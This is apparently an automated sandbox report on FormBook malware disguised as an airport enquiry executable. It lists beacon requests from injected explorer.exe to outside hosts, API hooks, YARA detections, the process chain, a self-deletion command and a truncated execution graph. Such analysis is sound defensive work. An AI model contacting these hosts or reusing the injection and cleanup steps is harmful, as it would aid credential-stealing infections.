          Aug 27, 2024 10:53:39.708156109 CEST169OUTGET /pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz HTTP/1.1
          Host: www.wheresthechocolateat.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Aug 27, 2024 10:53:40.200354099 CEST418INHTTP/1.1 301 Moved Permanently
          location: https://wheresthechocolateat.com/pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz
          vary: Accept-Encoding
          server: DPS/2.0.0+sha-1e48316
          x-version: 1e48316
          x-siteid: us-east-1
          set-cookie: dps_site_id=us-east-1; path=/
          date: Tue, 27 Aug 2024 08:53:40 GMT
          keep-alive: timeout=5
          transfer-encoding: chunked
          connection: close
          Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.449740103.224.212.214802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Aug 27, 2024 10:54:00.865820885 CEST159OUTGET /pt46/?ara=ssXGlCK/Wr83GZj+/MTEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP81BMj74Ur0OQ&D8V=_FNDAz HTTP/1.1
          Host: www.serverdayz.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.449741104.18.23.89802580C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Aug 27, 2024 10:54:21.155150890 CEST164OUTGET /pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz HTTP/1.1
          Host: www.theselflovesite.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Aug 27, 2024 10:54:21.640928030 CEST555INHTTP/1.1 301 Moved Permanently
          Date: Tue, 27 Aug 2024 08:54:21 GMT
          Content-Type: text/html
          Content-Length: 167
          Connection: close
          Cache-Control: max-age=3600
          Expires: Tue, 27 Aug 2024 09:54:21 GMT
          Location: https://www.theselflovesite.com/pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz
          Server: cloudflare
          CF-RAY: 8b9ad620da4142d4-EWR
          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


          Code Manipulations

          User Modules

          Hook Summary

          Function NameHook TypeActive in Processes
          PeekMessageAINLINEexplorer.exe
          PeekMessageWINLINEexplorer.exe
          GetMessageWINLINEexplorer.exe
          GetMessageAINLINEexplorer.exe

          Processes

          Process: explorer.exe, Module: user32.dll
          Function NameHook TypeNew Data
          PeekMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEB
          PeekMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEB
          GetMessageWINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEB
          GetMessageAINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEB

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:04:50:58
          Start date:27/08/2024
          Path:C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Imagebase:0xc80000
          File size:1'120'768 bytes
          MD5 hash:621C253A4D715E3AF16FE8BE2FDD8CB1
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low
          Has exited:true

          General

          Target ID:1
          Start time:04:51:00
          Start date:27/08/2024
          Path:C:\Windows\SysWOW64\svchost.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Imagebase:0xa0000
          File size:46'504 bytes
          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:true

          General

          Target ID:2
          Start time:04:51:01
          Start date:27/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff72b770000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.4143107748.000000000E6AA000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          Reputation:high
          Has exited:false

          General

          Target ID:3
          Start time:04:51:02
          Start date:27/08/2024
          Path:C:\Windows\SysWOW64\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
          Imagebase:0x970000
          File size:59'904 bytes
          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:false

          General

          Target ID:4
          Start time:04:51:06
          Start date:27/08/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
          Imagebase:0x240000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:04:51:06
          Start date:27/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7699e0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:3.6%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:5.7%
            Total number of Nodes:2000
            Total number of Limit Nodes:162
            execution_graph 96863 c8568a 96870 c85c18 96863->96870 96868 c856ba Mailbox 96882 ca0ff6 96870->96882 96872 c85c2b 96873 ca0ff6 Mailbox 59 API calls 96872->96873 96874 c8569c 96873->96874 96875 c85632 96874->96875 96920 c85a2f 96875->96920 96877 c85674 96877->96868 96881 c881c1 61 API calls Mailbox 96877->96881 96879 c85643 96879->96877 96927 c85d20 96879->96927 96933 c85bda 96879->96933 96881->96868 96886 ca0ffe 96882->96886 96884 ca1018 96884->96872 96886->96884 96887 ca101c std::exception::exception 96886->96887 96892 ca594c 96886->96892 96909 ca35e1 DecodePointer 96886->96909 96910 ca87db RaiseException 96887->96910 96889 ca1046 96911 ca8711 58 API calls _free 96889->96911 96891 ca1058 96891->96872 96893 ca59c7 96892->96893 96906 ca5958 96892->96906 96918 ca35e1 DecodePointer 96893->96918 96895 ca59cd 96919 ca8d68 58 API calls __getptd_noexit 96895->96919 96898 ca598b RtlAllocateHeap 96899 ca59bf 96898->96899 96898->96906 96899->96886 96901 ca59b3 96916 ca8d68 58 API calls __getptd_noexit 96901->96916 96905 ca5963 96905->96906 96912 caa3ab 58 API calls 2 library calls 96905->96912 96913 caa408 58 API calls 8 library calls 96905->96913 96914 ca32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96905->96914 96906->96898 96906->96901 96906->96905 96907 ca59b1 96906->96907 96915 ca35e1 DecodePointer 96906->96915 96917 ca8d68 58 API calls __getptd_noexit 96907->96917 96909->96886 96910->96889 96911->96891 96912->96905 96913->96905 96915->96906 96916->96907 96917->96899 96918->96895 96919->96899 96921 c85a40 96920->96921 96922 cbe065 96920->96922 96921->96879 96942 cd6443 59 API calls Mailbox 96922->96942 96924 cbe06f 96925 ca0ff6 Mailbox 59 API calls 96924->96925 96926 cbe07b 96925->96926 96928 c85d93 96927->96928 96931 c85d2e 96927->96931 96943 c85dae SetFilePointerEx 96928->96943 96930 c85d56 96930->96879 96931->96930 96932 c85d66 ReadFile 96931->96932 96932->96930 96932->96931 96934 c85bee 96933->96934 96935 cbe117 96933->96935 96944 c85b19 96934->96944 96949 cd6443 59 API calls Mailbox 96935->96949 96938 c85bfa 96938->96879 96939 cbe122 96940 ca0ff6 Mailbox 59 API calls 96939->96940 96941 cbe137 _memmove 96940->96941 96942->96924 96943->96931 96945 c85b31 96944->96945 96948 c85b2a _memmove 96944->96948 96946 cbe0a7 96945->96946 96947 ca0ff6 Mailbox 59 API calls 96945->96947 96947->96948 96948->96938 96949->96939 96950 c8107d 96955 c871eb 96950->96955 96952 c8108c 96986 ca2f80 96952->96986 96956 c871fb __write_nolock 96955->96956 96989 c877c7 96956->96989 96960 c872ba 97001 ca074f 96960->97001 96967 c877c7 59 API calls 96968 c872eb 96967->96968 97020 c87eec 96968->97020 96970 c872f4 RegOpenKeyExW 96971 cbecda RegQueryValueExW 96970->96971 96975 c87316 Mailbox 96970->96975 96972 cbed6c RegCloseKey 96971->96972 96973 cbecf7 96971->96973 96972->96975 96984 cbed7e _wcscat Mailbox __wsetenvp 96972->96984 96974 ca0ff6 Mailbox 59 API calls 96973->96974 96976 cbed10 96974->96976 96975->96952 97024 c8538e 96976->97024 96979 cbed38 97027 c87d2c 96979->97027 96981 cbed52 96981->96972 96983 c83f84 59 API calls 96983->96984 96984->96975 96984->96983 96985 c87b52 59 API calls 96984->96985 97036 c87f41 96984->97036 96985->96984 97073 ca2e84 96986->97073 96988 c81096 96990 ca0ff6 Mailbox 59 API calls 96989->96990 96991 c877e8 96990->96991 96992 ca0ff6 Mailbox 59 API calls 96991->96992 96993 c872b1 96992->96993 96994 c84864 96993->96994 97040 cb1b90 96994->97040 96997 c87f41 59 API calls 96998 c84897 96997->96998 97042 c848ae 96998->97042 97000 c848a1 Mailbox 97000->96960 97002 cb1b90 __write_nolock 97001->97002 97003 ca075c GetFullPathNameW 97002->97003 97004 ca077e 97003->97004 97005 c87d2c 59 API calls 97004->97005 97006 c872c5 97005->97006 97007 c87e0b 97006->97007 97008 c87e1f 97007->97008 97009 cbf173 97007->97009 97064 c87db0 97008->97064 97069 c88189 97009->97069 97012 c872d3 97014 c83f84 97012->97014 97013 cbf17e __wsetenvp _memmove 97015 c83f92 97014->97015 97019 c83fb4 _memmove 97014->97019 97018 ca0ff6 Mailbox 59 API calls 97015->97018 97016 ca0ff6 Mailbox 59 API calls 97017 c83fc8 97016->97017 97017->96967 97018->97019 97019->97016 97021 c87f06 97020->97021 97023 c87ef9 97020->97023 97022 ca0ff6 Mailbox 59 API calls 97021->97022 97022->97023 97023->96970 97025 ca0ff6 Mailbox 59 API calls 97024->97025 97026 c853a0 RegQueryValueExW 97025->97026 97026->96979 97026->96981 97028 c87d38 __wsetenvp 97027->97028 97029 c87da5 97027->97029 97031 c87d4e 97028->97031 97032 c87d73 97028->97032 97030 c87e8c 59 API calls 97029->97030 97035 c87d56 _memmove 97030->97035 97072 c88087 59 API calls Mailbox 97031->97072 97033 c88189 59 API calls 97032->97033 97033->97035 97035->96981 97037 c87f50 __wsetenvp _memmove 97036->97037 97038 ca0ff6 Mailbox 59 API calls 97037->97038 97039 c87f8e 97038->97039 97039->96984 97041 c84871 GetModuleFileNameW 97040->97041 97041->96997 97043 cb1b90 __write_nolock 97042->97043 97044 c848bb GetFullPathNameW 97043->97044 97045 c848da 97044->97045 97046 c848f7 97044->97046 97047 c87d2c 59 API calls 97045->97047 97048 c87eec 59 API calls 97046->97048 97049 c848e6 97047->97049 97048->97049 97052 c87886 97049->97052 97053 c87894 97052->97053 97056 c87e8c 97053->97056 97055 c848f2 97055->97000 97057 c87ea3 _memmove 97056->97057 97058 c87e9a 97056->97058 97057->97055 97058->97057 97060 c87faf 97058->97060 97061 c87fc2 97060->97061 97063 c87fbf _memmove 97060->97063 97062 ca0ff6 Mailbox 59 API calls 97061->97062 97062->97063 97063->97057 97065 c87dbf __wsetenvp 97064->97065 97066 c88189 59 API calls 97065->97066 97067 c87dd0 _memmove 97065->97067 97068 cbf130 _memmove 97066->97068 97067->97012 97070 ca0ff6 Mailbox 59 API calls 97069->97070 97071 c88193 97070->97071 97071->97013 97072->97035 97074 ca2e90 ___lock_fhandle 97073->97074 97081 ca3457 97074->97081 97080 ca2eb7 ___lock_fhandle 97080->96988 97098 ca9e4b 97081->97098 97083 ca2e99 97084 ca2ec8 DecodePointer DecodePointer 97083->97084 97085 ca2ea5 97084->97085 97086 ca2ef5 97084->97086 97095 ca2ec2 97085->97095 97086->97085 97144 ca89e4 59 API calls __wcsicmp_l 97086->97144 97088 ca2f58 EncodePointer EncodePointer 97088->97085 97089 ca2f2c 97089->97085 97093 ca2f46 EncodePointer 97089->97093 97146 ca8aa4 61 API calls 2 library calls 97089->97146 97090 ca2f07 97090->97088 97090->97089 97145 ca8aa4 61 API calls 2 library calls 97090->97145 97093->97088 97094 ca2f40 97094->97085 97094->97093 97147 ca3460 97095->97147 97099 ca9e6f EnterCriticalSection 97098->97099 97100 ca9e5c 97098->97100 97099->97083 97105 ca9ed3 97100->97105 97102 ca9e62 97102->97099 97129 ca32f5 58 API calls 3 library calls 97102->97129 97106 ca9edf ___lock_fhandle 97105->97106 97107 ca9ee8 97106->97107 97108 ca9f00 97106->97108 97130 caa3ab 58 API calls 2 library calls 97107->97130 97112 ca9f21 ___lock_fhandle 97108->97112 97133 ca8a5d 58 API calls 2 library calls 97108->97133 97110 ca9eed 97131 caa408 58 API calls 8 library calls 97110->97131 97112->97102 97114 ca9f15 97116 ca9f2b 97114->97116 97117 ca9f1c 97114->97117 97115 ca9ef4 97132 ca32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97115->97132 97119 ca9e4b __lock 58 API calls 97116->97119 97134 ca8d68 58 API calls __getptd_noexit 97117->97134 97121 ca9f32 97119->97121 97123 ca9f3f 97121->97123 97124 ca9f57 97121->97124 97135 caa06b InitializeCriticalSectionAndSpinCount 97123->97135 97136 ca2f95 97124->97136 97127 ca9f4b 97142 ca9f73 LeaveCriticalSection _doexit 97127->97142 97130->97110 97131->97115 97133->97114 97134->97112 97135->97127 97137 ca2fc7 __dosmaperr 97136->97137 97138 ca2f9e RtlFreeHeap 97136->97138 97137->97127 97138->97137 97139 ca2fb3 97138->97139 97143 ca8d68 58 API calls __getptd_noexit 97139->97143 97141 ca2fb9 GetLastError 97141->97137 97142->97112 97143->97141 97144->97090 97145->97089 97146->97094 97150 ca9fb5 LeaveCriticalSection 97147->97150 97149 ca2ec7 97149->97080 97150->97149 97151 ca7e93 97152 ca7e9f ___lock_fhandle 97151->97152 97188 caa048 GetStartupInfoW 97152->97188 97155 ca7ea4 97190 ca8dbc GetProcessHeap 97155->97190 97156 ca7efc 97157 ca7f07 97156->97157 97273 ca7fe3 58 API calls 3 library calls 97156->97273 97191 ca9d26 97157->97191 97160 ca7f0d 97161 ca7f18 __RTC_Initialize 97160->97161 97274 ca7fe3 58 API calls 3 library calls 97160->97274 97212 cad812 97161->97212 97164 ca7f27 97165 ca7f33 GetCommandLineW 97164->97165 97275 ca7fe3 58 API calls 3 library calls 97164->97275 97231 cb5173 GetEnvironmentStringsW 97165->97231 97168 ca7f32 97168->97165 97171 ca7f4d 97172 ca7f58 97171->97172 97276 ca32f5 58 API calls 3 library calls 97171->97276 97241 cb4fa8 97172->97241 97175 ca7f5e 97179 ca7f69 97175->97179 97277 ca32f5 58 API calls 3 library calls 97175->97277 97178 ca7f71 97180 ca7f7c __wwincmdln 97178->97180 97278 ca32f5 58 API calls 3 library calls 97178->97278 97255 ca332f 97179->97255 97261 c8492e 97180->97261 97183 ca7f90 97184 ca7f9f 97183->97184 97279 ca3598 58 API calls _doexit 97183->97279 97280 ca3320 58 API calls _doexit 97184->97280 97187 ca7fa4 ___lock_fhandle 97189 caa05e 97188->97189 97189->97155 97190->97156 97281 ca33c7 36 API calls 2 library calls 97191->97281 97193 ca9d2b 97282 ca9f7c InitializeCriticalSectionAndSpinCount ___lock_fhandle 97193->97282 97195 ca9d30 97196 ca9d34 97195->97196 97284 ca9fca TlsAlloc 97195->97284 97283 ca9d9c 61 API calls 2 library calls 97196->97283 97199 ca9d39 97199->97160 97200 ca9d46 97200->97196 97201 ca9d51 97200->97201 97285 ca8a15 97201->97285 97204 ca9d93 97293 ca9d9c 61 API calls 2 library calls 97204->97293 97207 ca9d98 97207->97160 97208 ca9d72 97208->97204 97209 ca9d78 97208->97209 97292 ca9c73 58 API calls 4 library calls 97209->97292 97211 ca9d80 GetCurrentThreadId 97211->97160 97213 cad81e ___lock_fhandle 97212->97213 97214 ca9e4b __lock 58 API calls 97213->97214 97215 cad825 97214->97215 97216 ca8a15 __calloc_crt 58 API calls 97215->97216 97217 cad836 97216->97217 97218 cad8a1 GetStartupInfoW 97217->97218 97219 cad841 ___lock_fhandle @_EH4_CallFilterFunc@8 97217->97219 97221 cad9e5 97218->97221 97223 cad8b6 97218->97223 97219->97164 97220 cadaad 97307 cadabd LeaveCriticalSection _doexit 97220->97307 97221->97220 97225 cada32 GetStdHandle 97221->97225 97226 cada45 GetFileType 97221->97226 97306 caa06b InitializeCriticalSectionAndSpinCount 97221->97306 97223->97221 97224 ca8a15 __calloc_crt 58 API calls 97223->97224 97228 cad904 97223->97228 97224->97223 97225->97221 97226->97221 97227 cad938 GetFileType 97227->97228 97228->97221 97228->97227 97305 caa06b InitializeCriticalSectionAndSpinCount 97228->97305 97232 ca7f43 97231->97232 97233 cb5184 97231->97233 97237 cb4d6b GetModuleFileNameW 97232->97237 97308 ca8a5d 58 API calls 2 library calls 97233->97308 97235 cb51aa _memmove 97236 cb51c0 FreeEnvironmentStringsW 97235->97236 97236->97232 97238 cb4d9f _wparse_cmdline 97237->97238 97240 cb4ddf _wparse_cmdline 97238->97240 97309 ca8a5d 58 API calls 2 library calls 97238->97309 97240->97171 97242 cb4fc1 __wsetenvp 97241->97242 97246 cb4fb9 97241->97246 97243 ca8a15 __calloc_crt 58 API calls 97242->97243 97251 cb4fea __wsetenvp 97243->97251 97244 cb5041 97245 ca2f95 _free 58 API calls 97244->97245 97245->97246 97246->97175 97247 ca8a15 __calloc_crt 58 API calls 97247->97251 97248 cb5066 97249 ca2f95 _free 58 API calls 97248->97249 97249->97246 97251->97244 97251->97246 97251->97247 97251->97248 97252 cb507d 97251->97252 97310 cb4857 58 API calls __wcsicmp_l 97251->97310 97311 ca9006 IsProcessorFeaturePresent 97252->97311 97254 cb5089 97254->97175 97257 ca333b __IsNonwritableInCurrentImage 97255->97257 97334 caa711 97257->97334 97258 ca3359 __initterm_e 97259 ca2f80 __cinit 67 API calls 97258->97259 97260 ca3378 __cinit __IsNonwritableInCurrentImage 97258->97260 97259->97260 97260->97178 97262 c84948 97261->97262 97272 c849e7 97261->97272 97263 c84982 IsThemeActive 97262->97263 97337 ca35ac 97263->97337 97267 c849ae 97349 c84a5b SystemParametersInfoW SystemParametersInfoW 97267->97349 97269 c849ba 97350 c83b4c 97269->97350 97271 c849c2 SystemParametersInfoW 97271->97272 97272->97183 97273->97157 97274->97161 97275->97168 97279->97184 97280->97187 97281->97193 97282->97195 97283->97199 97284->97200 97287 ca8a1c 97285->97287 97288 ca8a57 97287->97288 97290 ca8a3a 97287->97290 97294 cb5446 97287->97294 97288->97204 97291 caa026 TlsSetValue 97288->97291 97290->97287 97290->97288 97302 caa372 Sleep 97290->97302 97291->97208 97292->97211 97293->97207 97295 cb5451 97294->97295 97299 cb546c 97294->97299 97296 cb545d 97295->97296 97295->97299 97303 ca8d68 58 API calls __getptd_noexit 97296->97303 97298 cb547c HeapAlloc 97298->97299 97300 cb5462 97298->97300 97299->97298 97299->97300 97304 ca35e1 DecodePointer 97299->97304 97300->97287 97302->97290 97303->97300 97304->97299 97305->97228 97306->97221 97307->97219 97308->97235 97309->97240 97310->97251 97312 ca9011 97311->97312 97317 ca8e99 97312->97317 97316 ca902c 97316->97254 97318 ca8eb3 _memset __call_reportfault 97317->97318 97319 ca8ed3 IsDebuggerPresent 97318->97319 97325 caa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97319->97325 97322 ca8fba 97324 caa380 GetCurrentProcess TerminateProcess 97322->97324 97323 ca8f97 __call_reportfault 97326 cac836 97323->97326 97324->97316 97325->97323 97327 cac83e 97326->97327 97328 cac840 IsProcessorFeaturePresent 97326->97328 97327->97322 97330 cb5b5a 97328->97330 97333 cb5b09 5 API calls 2 library calls 97330->97333 97332 cb5c3d 97332->97322 97333->97332 97335 caa714 EncodePointer 97334->97335 97335->97335 97336 caa72e 97335->97336 97336->97258 97338 ca9e4b __lock 58 API calls 97337->97338 97339 ca35b7 DecodePointer EncodePointer 97338->97339 97402 ca9fb5 LeaveCriticalSection 97339->97402 97341 c849a7 97342 ca3614 97341->97342 97343 ca3638 97342->97343 97344 ca361e 97342->97344 97343->97267 97344->97343 97403 ca8d68 58 API calls __getptd_noexit 97344->97403 97346 ca3628 97404 ca8ff6 9 API calls __wcsicmp_l 97346->97404 97348 ca3633 97348->97267 97349->97269 97351 c83b59 __write_nolock 97350->97351 97352 c877c7 59 API calls 97351->97352 97353 c83b63 GetCurrentDirectoryW 97352->97353 97405 c83778 97353->97405 97355 c83b8c IsDebuggerPresent 97356 c83b9a 97355->97356 97357 cbd4ad MessageBoxA 97355->97357 97358 c83c73 97356->97358 97360 cbd4c7 97356->97360 97361 c83bb7 97356->97361 97357->97360 97359 c83c7a SetCurrentDirectoryW 97358->97359 97362 c83c87 Mailbox 97359->97362 97615 c87373 59 API calls Mailbox 97360->97615 97486 c873e5 97361->97486 97362->97271 97365 cbd4d7 97371 cbd4ed SetCurrentDirectoryW 97365->97371 97367 c83bd5 GetFullPathNameW 97368 c87d2c 59 API calls 97367->97368 97369 c83c10 97368->97369 97502 c90a8d 97369->97502 97371->97362 97402->97341 97403->97346 97404->97348 97406 c877c7 59 API calls 97405->97406 97407 c8378e 97406->97407 97626 c83d43 97407->97626 97409 